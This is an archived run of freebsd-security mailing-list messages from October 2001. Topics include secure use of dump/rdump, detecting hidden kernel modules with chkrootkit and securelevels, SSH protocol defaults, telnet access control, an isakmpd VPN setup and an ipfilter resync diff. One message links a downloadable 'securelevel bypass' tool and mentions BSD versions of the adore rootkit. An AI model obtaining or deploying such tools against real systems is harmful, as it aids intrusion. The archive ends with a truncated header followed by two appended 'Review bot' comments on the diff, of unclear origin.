From owner-freebsd-security Sun Oct 21 5: 4:42 2001
Date: Sun, 21 Oct 2001 08:04:25 -0400
To: Hassan Halta
From: Mike Tancsa
Subject: Re: using dump for backups.

At 11:19 PM 10/20/2001 -0500, Hassan Halta wrote:
>Hi all,
>
>I was thinking of using dump/restore way to backup files on the system. I
>heard sometime ago that FreeBSD dump was insecure. So, I am wondering if
>this is still the case, and how insecure it is, or what the fixes for it?
>I would like to know more about it if possible,

Dump just creates a backup file. Perhaps you are thinking of the method
of using dump to a remote file which uses rsh. That _method_ of using
dump is insecure. If you will be using dump to dump to a remote machine,
just use ssh instead.

---Mike
--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Sentex Communications, mike@sentex.net
Providing Internet since 1994 www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Sun Oct 21 7:33: 3 2001
Date: Sun, 21 Oct 2001 11:33:23 -0300
From: Fernando Schapachnik
To: Hassan Halta
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: using dump for backups.

dump has had a history of exploitable overflows, which of course had
been fixed.

Anyway, the risk was just having it on the system, and using it or
not didn't change the risk.

Regards.

In a previous message, Hassan Halta wrote:
> Hi all,
>
> I was thinking of using dump/restore way to backup files on the system. I
> heard sometime ago that FreeBSD dump was insecure.
> So, I am wondering if
> this is still the case, and how insecure it is, or what the fixes for it?
> I would like to know more about it if possible,
>
> Thanks a lot,
>
> Hassan
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message

Fernando P. Schapachnik
Network Technology and Information Systems Manager
VIA NET.WORKS ARGENTINA S.A.
fschapachnik@vianetworks.com.ar
Tel.: (54-11) 4323-3381

From owner-freebsd-security Sun Oct 21 15:27:47 2001
Date: Mon, 22 Oct 2001 09:27:30 +1100
From: Andrew Johns
To: CS
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: KLD detectors

CS wrote:
>
> Hello,
>
> Does anyone know of a program for FreeBSD to look for "hidden" KLDs?
>
> I found this for linux:
>
> http://www.hsc.fr/ressources/breves/LKMrootkits.html
>
> But so far, nothing for FreeBSD.
>
> Thanks,
>
> CS
>

I found this a while ago - have never looked into it myself -
just saved the URL for times like this.

http://www.chkrootkit.org

They have versions for most un*x's.
--
Andrew Johns
================================================================
BUGS:This utility is a prototype which lasted several years past
its expiration date and is greatly in need of death.
- from FreeBSD sysinstall man page

From owner-freebsd-security Sun Oct 21 18: 0:57 2001
Date: Mon, 22 Oct 2001 03:03:07 +0200 (SAST)
From: The Psychotic Viper
To: Andrew Johns
Cc: CS
Subject: Re: KLD detectors

Hi,

On Mon, 22 Oct 2001, Andrew Johns wrote:

> CS wrote:
> >
> > Hello,
> >
> > Does anyone know of a program for FreeBSD to look for "hidden" KLDs?
> >
> > I found this for linux:
> >
> > http://www.hsc.fr/ressources/breves/LKMrootkits.html
> >
> > But so far, nothing for FreeBSD.
> >
> > Thanks,
> >
> > CS
> >
>
> I found this a while ago - have never looked into it myself -
> just saved the URL for times like this.
>
> http://www.chkrootkit.org
>
> They have versions for most un*x's.
better yet they in the ports /usr/ports/security/chkrootkit =) and have no
idea on how to check for them but you could enable kernel secure levels
(if the machine is not going to use X or any securelevelphobic software)
which would limit the chance of being bitten by a stray module. Just its
not the all-curing-fix but limits what you would need to look at/check to
avoid such nasties.

HTH,
PsyV

From owner-freebsd-security Sun Oct 21 18:28:27 2001
Date: Sun, 21 Oct 2001 21:28:18 -0400 (EDT)
From: Rob Simmons
To: Hassan Halta
Cc: freebsd-security@freebsd.org
Subject: Re: using dump for backups.

Using dump locally to a tape, or other device is safe. Using rdump and
enabling rsh on a remote machine to dump to a device on that machine can
be unsafe due to rsh, not dump itself.
If you need to dump to a remote device, you can use ssh to make it
safer. You can also look into using Amanda, which can use Kerberos to
make the remote dumps safer as well. Amanda can use tar as well. As far
as Amanda is concerned, dump and tar are interchangeable.

Also, unfortunately the port for Amanda in the ports collection does not
have options for Kerberos. You will need to look at the configure
options to Amanda, and extract the proper configure switches, and add
them yourself to CONFIGURE_ARGS (of course, after adding
MAKE_KERBEROS4=yes to your make.conf). As far as I know, Amanda only
works with krb4, not krb5 yet. I could be wrong.

Robert Simmons
Systems Administrator
http://www.wlcg.com/

On Sat, 20 Oct 2001, Hassan Halta wrote:

> Hi all,
>
> I was thinking of using dump/restore way to backup files on the system. I
> heard sometime ago that FreeBSD dump was insecure. So, I am wondering if
> this is still the case, and how insecure it is, or what the fixes for it?
> I would like to know more about it if possible,
>
> Thanks a lot,
>
> Hassan
>
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

From owner-freebsd-security Mon Oct 22 2:26:45 2001
Date: Mon, 22 Oct 2001 02:25:34 -0700
From: "Crist J. Clark"
To: Fernando Schapachnik
Cc: Hassan Halta, freebsd-security@FreeBSD.ORG
Subject: Re: using dump for backups.

On Sun, Oct 21, 2001 at 11:33:23AM -0300, Fernando Schapachnik wrote:
> dump has had a history of exploitable overflows, which of course had
> been fixed.
>
> Anyway, the risk was just having it on the system, and using it or
> not didn't change the risk.

And dump(8) has not been setuid root since 1997. It has not been setgid
tty for just over a month.
--
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

From owner-freebsd-security Mon Oct 22 2:30:21 2001
Date: Mon, 22 Oct 2001 10:31:04 +0100
From: Rasputin
To: security@freebsd.org
Subject: Re: KCheckPass -- make it setuid root or not?

* nuzrin yaapar [011019 18:50]:
> On Saturday 20 October 2001 1:07 am, Will Andrews wrote:
> > On Fri, Oct 19, 2001 at 12:07:06PM -0500, Will Andrews wrote:
> > > OK, so I keep getting mail every now and then from people who
> > > can't figure out why kcheckpass / kscreensaver won't authenticate
> > > their password(s). It's because I decided to play it safe and
> > > made kcheckpass non setuid root, which it needs in order to call
> > > getpwnam().
> > >
> > > But now I'm tired of getting these emails from people who don't
> > > notice the message that kdebase spouts about it. I want to know
> > > if people think it's a safe "risk" to give kcheckpass setuid root
> > > privileges so it Just Works(tm) when people try KDE.

> So, I think it's better to have setuid root for kcheckpass. Most people won't
> notice the message, unless they have nothing to do and decided to watch the
> whole compilation/installation process. Most of us just 'cd
> /usr/ports/x11/kde2 && make install clean' and leave it overnight to finish.
> Next morning when kde2 installation have finished...the message has long
> scroll past the screen and lost....

Surely a lot of ports have a target to allow you to print a message
at the end of the build (usually after the install target) - if you
point it out at that stage, there's no excuse for not reading it, I
guess (/usr/ports/x11/eterm does this if you need to check how it's
done)

--
Necessity is a mother.
Rasputin :: Jack of All Trades - Master of Nuns ::

From owner-freebsd-security Mon Oct 22 2:35:31 2001
Date: Mon, 22 Oct 2001 10:36:16 +0100
From: Rasputin
To: security@freebsd.org
Subject: Re: KCheckPass -- make it setuid root or not?

Ugh, sorry - missing subject fools another sucker :)

--
Rasputin :: Jack of All Trades - Master of Nuns ::

From owner-freebsd-security Mon Oct 22 12:17: 1 2001
Date: Mon, 22 Oct 2001 15:07:08 -0400 (EDT)
From: CS
To: The Psychotic Viper
Cc: Andrew Johns, "freebsd-security@FreeBSD.ORG"
Subject: Re: KLD detectors

Hi,

Thanks for the info, I'll test it out on a few I've found (bsd versions of
adore).

I'm also interested in utilizing securelevels, but I'm still not 100% sure
that securelevel 1 will actually stop this, as there seem to be a number
of tools out there to bypass the securelevel restriction. For example:

http://www.s0ftpj.org/en/tools.html

Scroll down to "securelevel bypass":
http://www.s0ftpj.org/tools/securelvl.tgz

Also, I'm finding myself upgrading bits and pieces of the system more
often (telnetd, openssh, etc.) and I'm wavering on what exactly I should
set the "schg" flags on. Most of my machines are remote, and I also don't
want to revert to NT behaviour of "oh you patched, now you must reboot"...

Charles

On Mon, 22 Oct 2001, The Psychotic Viper wrote:

> Hi,
>
> On Mon, 22 Oct 2001, Andrew Johns wrote:
>
> > CS wrote:
> > >
> > > Hello,
> > >
> > > Does anyone know of a program for FreeBSD to look for "hidden" KLDs?
> > >
> > > I found this for linux:
> > >
> > > http://www.hsc.fr/ressources/breves/LKMrootkits.html
> > >
> > > But so far, nothing for FreeBSD.
> > >
> > > Thanks,
> > >
> > > CS
> > >
> >
> > I found this a while ago - have never looked into it myself -
> > just saved the URL for times like this.
> >
> > http://www.chkrootkit.org
> >
> > They have versions for most un*x's.
> better yet they in the ports /usr/ports/security/chkrootkit =) and have no
> idea on how to check for them but you could enable kernel secure levels
> (if the machine is not going to use X or any securelevelphobic software)
> which would limit the chance of being bitten by a stray module. Just its
> not the all-curing-fix but limits what you would need to look at/check to
> avoid such nasties.
>
> HTH,
> PsyV
>
>

From owner-freebsd-security Mon Oct 22 16:33:40 2001
Date: Tue, 23 Oct 2001 01:35:35 +0200 (SAST)
From: The Psychotic Viper
To: CS
Cc: Andrew Johns, "freebsd-security@FreeBSD.ORG"
Subject: Re: KLD detectors

Hi again,

On Mon, 22 Oct 2001, CS wrote:

> Hi,
>
> Thanks for the info, I'll test it out on a few I've found (bsd versions of
> adore).
>
> I'm also interested in utilizing securelevels, but I'm still not 100% sure
> that securelevel 1 will actually stop this, as there seem to be a number
> of tools out there to bypass the securelevel restriction.
> For example:
>
> http://www.s0ftpj.org/en/tools.html
>
> Scroll down to "securelevel bypass":
> http://www.s0ftpj.org/tools/securelvl.tgz

Yes remember secure levels aren't going to be the all in one solution
(not sure if I mentioned it before) but helps aid security aware admins
and provides yet another layer of security, use it in tandem with
freebsd's own security scripts and maybe aide or tripwire to increase
security, but any clue'd up cracker could know was around either
mechanism which is why the more the better (but be careful not to kludge
the machine down with too much as it can become a nightmare too).

> Also, I'm finding myself upgrading bits and pieces of the system more
> often (telnetd, openssh, etc.) and I'm wavering on what exactly I should
> set the "schg" flags on. Most of my machines are remote, and I also don't
> want to revert to NT behaviour of "oh you patched, now you must reboot"...

As for that point then maybe one of the other alternatives would serve
you better as you can do upgrades seamlessly if everything works the way
it should. Kernel secure levels make it slightly more difficult to do
regular work on the system. So look into other ways of securing your
internal machine and monitoring and see which suits you best. Best place
to start looking would be /usr/ports/security and around the internet.

HTH
PsyV

From owner-freebsd-security Mon Oct 22 16:50:12 2001
Date: Mon, 22 Oct 2001 16:49:32 -0700
From: "Crist J. Clark"
To: CS
Cc: The Psychotic Viper, Andrew Johns, "freebsd-security@FreeBSD.ORG"
Subject: Re: KLD detectors

On Mon, Oct 22, 2001 at 03:07:08PM -0400, CS wrote:
> Hi,
>
> Thanks for the info, I'll test it out on a few I've found (bsd versions of
> adore).
>
> I'm also interested in utilizing securelevels, but I'm still not 100% sure
> that securelevel 1 will actually stop this, as there seem to be a number
> of tools out there to bypass the securelevel restriction.
> For example:
>
> http://www.s0ftpj.org/en/tools.html
>
> Scroll down to "securelevel bypass":
> http://www.s0ftpj.org/tools/securelvl.tgz

If you actually look at what this is, it is a KLD that once loaded, will
allow users to load KLDs at securelevel > 0. If you have a securelevel > 0
and do not already have this module loaded, it doesn't do anything for
you. It doesn't break securelevel(8) or provide a workaround.
--
Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

From owner-freebsd-security Mon Oct 22 21:58:39 2001
Date: Tue, 23 Oct 2001 00:58:12 -0400 (EDT)
From: Igor Roshchin
To: ghelmer@palisadesys.com, scanner@jurai.net, will@physics.purdue.edu
Subject: RE: your mail
Cc: kde@FreeBSD.ORG, ports@FreeBSD.ORG, security@FreeBSD.ORG

> From owner-freebsd-security@FreeBSD.ORG Fri Oct 19 13:33:02 2001
> From: "Guy Helmer"
> To: "Will Andrews" ,
> Cc: , ,
> Subject: RE: your mail
> Date: Fri, 19 Oct 2001 12:36:15 -0500
>
> > On Friday, October 19, 2001 12:16 PM, Will Andrews wrote:
> > On Fri, Oct 19, 2001 at 01:15:31PM -0400, scanner@jurai.net wrote:
> > > I think the actual problem isn't so much the message per se,
> > its the fact
> > > its placed in the wrong place.
> > > It should be shown at the *end* of the
> > > build instead of during the building of kdebase. When you go to
> > build the
> > > metaport of KDE2 no one wants to sit there watching the output for 12
> > > hours while it builds. They want to come back and see the familiar
> > > "everything built ok" and then install it. If you place it as
> > the message
> > > at the end of the build *alot* more people would see the
> > > message. Otherwise no one is going to catch it. Just my $.02.
> >
> > Yeah, I'm aware of that. Unfortunately, there is nothing I can
> > do about that, because people might be invoking the kdebase port
> > from anywhere. So it's a general ports problem. :\
>
> How about sending an email message to "root" with this message? It solves
> the problem of the message scrolling by during the installation...
>

I don't think I'd always want to have an e-mail message sent to root
or to the building user. Probably, it can be an option, but not a
default one.

Talking about "general ports problem": script(1) is a good solution
in this situation. It allows one to record all output, including
warnings and such.

Regards,

Igor

From owner-freebsd-security Tue Oct 23 6:16:42 2001
Date: Tue, 23 Oct 2001 08:17:29 -0500
From: Krzysztof Parzyszek
To: freebsd-security@freebsd.org
Subject: SSH default protocol

I noticed some time ago that in ssh_config, the Protocol field
is now `1, 2' instead of `2, 1' as it used to be.
Does anyone know why this has changed?

--
,oOo.Bc -=EE Krzysztof Parzyszek 10/12/2001 2:59pm
-'7' `L' ---If this sentence is true, then every sentence is true.

From owner-freebsd-security Tue Oct 23 11:36:44 2001
To: Krzysztof Parzyszek
Cc: freebsd-security@freebsd.org
Subject: Re: SSH default protocol
From: "Brian F. Feldman"
Date: Tue, 23 Oct 2001 14:36:33 -0400

Krzysztof Parzyszek wrote:
> I noticed some time ago that in ssh_config, the Protocol field
> is now `1, 2' instead of `2, 1' as it used to be.
> Does anyone know why this has changed?

Users complain that "SSH doesn't work anymore!!!", and don't RTFM and get
things wrong. Rather, that is the strawman used, and I haven't seen a user
not understand that protocol 2 works differently than protocol 1. I'd
rather give users more credit and let people realize they should be using
protocol 2, not 1 anymore. But convince everyone else of that.

--
 Brian Fundakowski Feldman           \  FreeBSD: The Power to Serve!  /
 green@FreeBSD.org                    `------------------------------'

From owner-freebsd-security Tue Oct 23 13:31:53 2001
Date: Tue, 23 Oct 2001 13:31:17 -0700
From: "Crist J. Clark"
To: Krzysztof Parzyszek
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: SSH default protocol

On Tue, Oct 23, 2001 at 08:17:29AM -0500, Krzysztof Parzyszek wrote:
> I noticed some time ago that in ssh_config, the Protocol field
> is now `1, 2' instead of `2, 1' as it used to be.
> Does anyone know why this has changed?

I don't believe it ever was '2,1' in -STABLE. Some people may be
misled by the fact that in the past there was a line like,

  # Protocol 2,1

In /etc/ssh/ssh_config. Notice it is commented out. ssh(1) still used
protocol 1 by default.
That is, the default was 'Protocol 1,2'. Changing it in -STABLE is considered too disruptive. Just imagine the flood of mail on this list if the change were to be made. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 23 14: 8: 6 2001 Delivered-To: freebsd-security@freebsd.org Received: from warsaw.scl.ameslab.gov (warsaw.scl.ameslab.gov [147.155.137.63]) by hub.freebsd.org (Postfix) with ESMTP id D6F8A37B403 for ; Tue, 23 Oct 2001 14:08:00 -0700 (PDT) Received: (from kparz@localhost) by warsaw.scl.ameslab.gov (8.11.6/8.11.6) id f9NL8uT12215; Tue, 23 Oct 2001 16:08:56 -0500 (CDT) (envelope-from kparz) Date: Tue, 23 Oct 2001 16:08:56 -0500 From: Krzysztof Parzyszek To: cjclark@alum.mit.edu Cc: freebsd-security@FreeBSD.ORG Subject: Re: SSH default protocol Message-ID: <20011023160856.A12153@warsaw.scl.ameslab.gov> References: <20011023081729.A10955@warsaw.scl.ameslab.gov> <20011023133117.A4472@blossom.cjclark.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011023133117.A4472@blossom.cjclark.org>; from cristjc@earthlink.net on Tue, Oct 23, 2001 at 01:31:17PM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Tue, Oct 23, 2001 at 01:31:17PM -0700, Crist J. Clark wrote: > > I don't believe it ever was '2,1' in -STABLE. Some people may be > misled by the fact that in the past there was a line like, > > # Protocol 2,1 > > In /etc/ssh/ssh_config. Notice it is commented out. ssh(1) still used > protocol 1 by default. That is, the default was 'Protocol 1,2'. Yes, now I think it's true... 
Especially because the files in ~/.ssh didn't have '2' at the end of their names (i.e. known_hosts, instead of known_hosts2, etc.) -- ,oOo.Bc -=EE Krzysztof Parzyszek 10/12/2001 2:59pm -'7' `L' ---If this sentence is true, then every sentence is true. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 23 16:10:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from www.kpi.com.au (www.kpi.com.au [203.39.132.210]) by hub.freebsd.org (Postfix) with ESMTP id 5E3B537B405; Tue, 23 Oct 2001 16:10:39 -0700 (PDT) Received: from kpi.com.au (localhost.kpi.com.au [127.0.0.1]) by www.kpi.com.au (8.9.3/8.9.3) with ESMTP id KAA04618; Wed, 24 Oct 2001 10:16:57 +1100 (EST) (envelope-from johnsa@kpi.com.au) Message-ID: <3BD5F875.1781EDD6@kpi.com.au> Date: Wed, 24 Oct 2001 10:08:37 +1100 From: Andrew Johns X-Mailer: Mozilla 4.7 [en-gb] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: Igor Roshchin Cc: ghelmer@palisadesys.com, scanner@jurai.net, will@physics.purdue.edu, kde@FreeBSD.ORG, ports@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: your mail References: <200110230458.f9N4wCX13835@giganda.komkon.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Igor Roshchin wrote: > > > From owner-freebsd-security@FreeBSD.ORG Fri Oct 19 13:33:02 2001 > > From: "Guy Helmer" > > To: "Will Andrews" , > > Cc: , , > > Subject: RE: your mail > > Date: Fri, 19 Oct 2001 12:36:15 -0500 > > > > > On Friday, October 19, 2001 12:16 PM, Will Andrews wrote: > > > On Fri, Oct 19, 2001 at 01:15:31PM -0400, scanner@jurai.net wrote: > > > > I think the actual problem isn't so much the message per se, > > > its the fact > > > > its placed in the wrong place. 
It should be shown at the *end* of the > > > > build instead of during the building of kdebase. When you go to > > > build the > > > > metaport of KDE2 no one wants to sit there watching the output for 12 > > > > hours while it builds. They want to come back and see the familiar > > > > "everything built ok" and then install it. If you place it as > > > the message > > > > at the end of the build *a lot* more people would see the > > > > message. Otherwise no one is going to catch it. Just my $.02. > > > > > > Yeah, I'm aware of that. Unfortunately, there is nothing I can > > > do about that, because people might be invoking the kdebase port > > > from anywhere. So it's a general ports problem. :\ > > > > How about sending an email message to "root" with this message? It solves > > the problem of the message scrolling by during the installation... > > > > I don't think I'd always want to have an e-mail message sent to root or > to the building user. Probably, it can be an option, but not a default one. > > Talking about "general ports problem": > script(1) is a good solution in this situation. > It allows one to record all output, including warnings and such. > I like that idea of using script, as long as ports/packages fed out something useful to grep for. i.e. a standard error message that wouldn't get mixed up with everything else or confused with real files (error.c, error.conf?) eg: script installation proceeds and appears to end successfully exit grep -i error scriptfile && mail -s "Errors during install" user,root < scriptfile Then you only get mail for errors, but it does rely on the error word appearing AND there are plenty of error.c, error_something.c files in the system. -- Andrew Johns ================================================================ BUGS:This utility is a prototype which lasted several years past its expiration date and is greatly in need of death. 
JKH - from FreeBSD sysinstall man page To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 2: 3:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from loverboy.highspeedweb.net (loverboy.highspeedweb.net [204.181.12.40]) by hub.freebsd.org (Postfix) with SMTP id F3B5B37B401 for ; Wed, 24 Oct 2001 02:03:08 -0700 (PDT) Received: (qmail 21142 invoked by uid 510); 24 Oct 2001 09:03:01 -0000 Received: from unknown (HELO padjajaran) (202.150.91.162) by progs4wealth.com with SMTP; 24 Oct 2001 09:03:01 -0000 Message-ID: <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> From: "Purwa Riadi" To: References: <20011023081729.A10955@warsaw.scl.ameslab.gov> Subject: telnet limitation Date: Wed, 24 Oct 2001 16:07:40 +0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Dear FreeBSDer, If I wanna give rules in my server, therefore just certain IP that can telnet to my server, whats scripts that should I change and configure? Anyone can explain to me? 
thx & regards Purwa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 2:23:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from cerebellum.za.net (cerebellum.za.net [196.34.172.103]) by hub.freebsd.org (Postfix) with ESMTP id A973A37B401 for ; Wed, 24 Oct 2001 02:23:12 -0700 (PDT) Received: from berthome ([196.15.168.31]) by cerebellum.za.net (8.11.6/8.11.3) with SMTP id f9O9ITO51771; Wed, 24 Oct 2001 11:18:31 +0200 (SAST) (envelope-from creati0n@area.co.za) From: "Ian Barnes" To: "Purwa Riadi" Cc: Subject: RE: telnet limitation Date: Wed, 24 Oct 2001 11:19:57 +0200 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <007c01c15c6b$5a861fc0$ab5b96ca@padjajaran> X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You must edit your hosts.allow config file in the /etc directory specifying who is allowed to use telnet. -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Purwa Riadi Sent: 24 October 2001 11:08 To: freebsd-security@FreeBSD.ORG Subject: telnet limitation Dear FreeBSDer, If I wanna give rules in my server, therefore just certain IP that can telnet to my server, whats scripts that should I change and configure? Anyone can explain to me? 
thx & regards Purwa To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 9:14: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from mk-smarthost-2.mail.uk.worldonline.com (mk-smarthost-2.mail.uk.worldonline.com [212.74.112.72]) by hub.freebsd.org (Postfix) with ESMTP id BDDB637B401 for ; Wed, 24 Oct 2001 09:13:56 -0700 (PDT) Received: from scooby-s1.lineone.net ([194.75.152.224] helo=lineone.net) by mk-smarthost-2.mail.uk.worldonline.com with smtp (Exim 3.22 #3) id 15wQfC-00031t-00 for freebsd-security@freebsd.org; Wed, 24 Oct 2001 17:13:54 +0100 To: freebsd-security@freebsd.org From: tariq_rashid@lineone.net Subject: 2-channel isakmpd on freebsd4.4R? Message-Id: Date: Wed, 24 Oct 2001 17:13:54 +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org first: let me apologise for thanking those who gave useful advice and help last week - i was away unexpectedly. ok - consider the following: [ isakmpd ] 192.168.1.1 ------- 192.168.1.2 [ isakmpd ] [ vpn H ] [ vpn A ] | | | 10.0.7.2 10.8.0.1 | | | | | { 10.0.0.0/16 subnet } { 10.8.0.0/16 subnet } *- in fact there are more than one subnets connected to "H" these are A, B, C etc ... these all have dynamic public IPs (so 192.168.1.2 may change) - only "H" 192.168.1.1 is static *- configuration uses pre-shared secrets, aggressive mode USER_FQDN etc etc this is fine (thanks to people on this list) Communication from any subnet to any subnet works fine. This is done by using multiple Connections= (spoke) and Passive-connections= (hub) tags... 
eg spoke: Connections= IPsec-A-H IPsec-A-B eg hub: Passive-Connections= IPsec-H-A IPsec-H-B IPsec-A-B IPsec-B-A However, communication initiated from the vpn-endpoint boxes themselves does not work. (I suspect that despite the packets being formed with source=external-ip, the ipsec "trap" doesn't catch them). Solution tried: MORE Connections were tried. In addition to the IPV4_ADDR_SUBNET endpoints, non-subnet IPV4_ADDR was tried. This failed. (This fails on its own too???) The UGLY solution which works is to use NATd: something like ... ipfw delete 50; ipfw add 50 divert natd all from any to 10.8.0.0/16 via rl0; natd -v -n fxp0 Keep in mind that isakmpd.conf can't be over-specified due to the need for the spoke-nets requiring dynamic public IPs. Any better ideas? much appreciated! tariq To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 11:28:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from mighty.grot.org (mighty.grot.org [216.15.97.5]) by hub.freebsd.org (Postfix) with ESMTP id 9B17A37B406; Wed, 24 Oct 2001 11:28:19 -0700 (PDT) Received: by mighty.grot.org (Postfix, from userid 515) id 4ED785E04; Wed, 24 Oct 2001 11:28:19 -0700 (PDT) Date: Wed, 24 Oct 2001 11:28:19 -0700 From: "R.P. Aditya" To: freebsd-security@freebsd.org Cc: freebsd-mobile@freebsd.org Subject: ipfilter resync on pccard_ether insertions? Message-ID: <20011024112819.A27379@mighty.grot.org> Reply-To: "R.P. 
Aditya" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline X-PGP-Key: http://www.grot.org/pubkey.asc X-PGP-Key-ID: 0x6405D8D5 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, AFAIK, any time a new interface is added, ipfilter needs to be "resynced" with an "ipf -y": -y Manually resync the in-kernel interface list maintained by IP Filter with the current interface status list. to facilitate this for pccard interfaces, I made some local changes to /etc/defaults/rc.conf and /etc/pccard_ether; do these changes look reasonable? Can someone recommend a better approach? (My ipf.rules protect the entire box regardless of interface so it seems to work fine) If not, any objections to committing this?: diff -r1.1 /etc/defaults/rc.conf 62c62 < ipfilter_program="/sbin/ipf -Fa -f" --- > ipfilter_program="/sbin/ipf" 67c67 < ipfilter_flags="-E" # should be *empty* when ipf is _not_ a module --- > ipfilter_flags=" -Fa -f" # should be *empty* when ipf is _not_ a module and: diff -r1.1 /etc/pccard_ether 9a10,15 > if [ -x /usr/bin/logger ]; then > LOGGER="/usr/bin/logger -s -p user.notice -t pccard_ether" > else > LOGGER=echo > fi > 29a36,45 > > #resync ipf if we bring up a new interface > if /sbin/ipfstat -i > /dev/null 2>&1; then > case "${ipfilter_enable}" in > [Yy][Ee][Ss]) > ${ipfilter_program:-/sbin/ipf} -y > $LOGGER "Resyncing ipf to use new interface" > ;; > esac > fi 31c47 < echo "${dhcp_program}: DHCP client software not available" --- > $LOGGER "${dhcp_program}: DHCP client software not available" Thanks, Adi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Oct 24 16:14:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from gatehouse.quadtelecom.com (ool-18bd6caa.dyn.optonline.net 
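Review bot: In the 67c67 hunk of /etc/defaults/rc.conf, ipfilter_flags loses -E and gains " -Fa -f", yet the trailing comment still says the variable should be *empty* when ipf is not a module. With the load options now living in the flags, emptying the variable as the comment instructs would start ipf without loading any rule file, and the module case no longer passes -E at all. Either keep -E and the load options in separate variables or rewrite the comment to say which part may be emptied. Because -f has to be followed directly by the rules file name, it is also worth confirming the order in which the rc script expands ipfilter_program, ipfilter_flags and the rules path, which this diff does not show.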
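Review bot: In the 29a36,45 hunk of /etc/pccard_ether, "${ipfilter_program:-/sbin/ipf} -y" is only safe when ipfilter_program is a bare path. Any rc.conf that still carries the previous default, "/sbin/ipf -Fa -f", turns the call into "/sbin/ipf -Fa -f -y", which flushes the rule set and treats -y as a rules file name on every card insertion instead of resyncing. Calling /sbin/ipf -y directly would avoid that dependency, since a resync needs none of the load options. The "Resyncing ipf to use new interface" message is also logged whether or not the command succeeded; test the exit status and log a failure separately.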
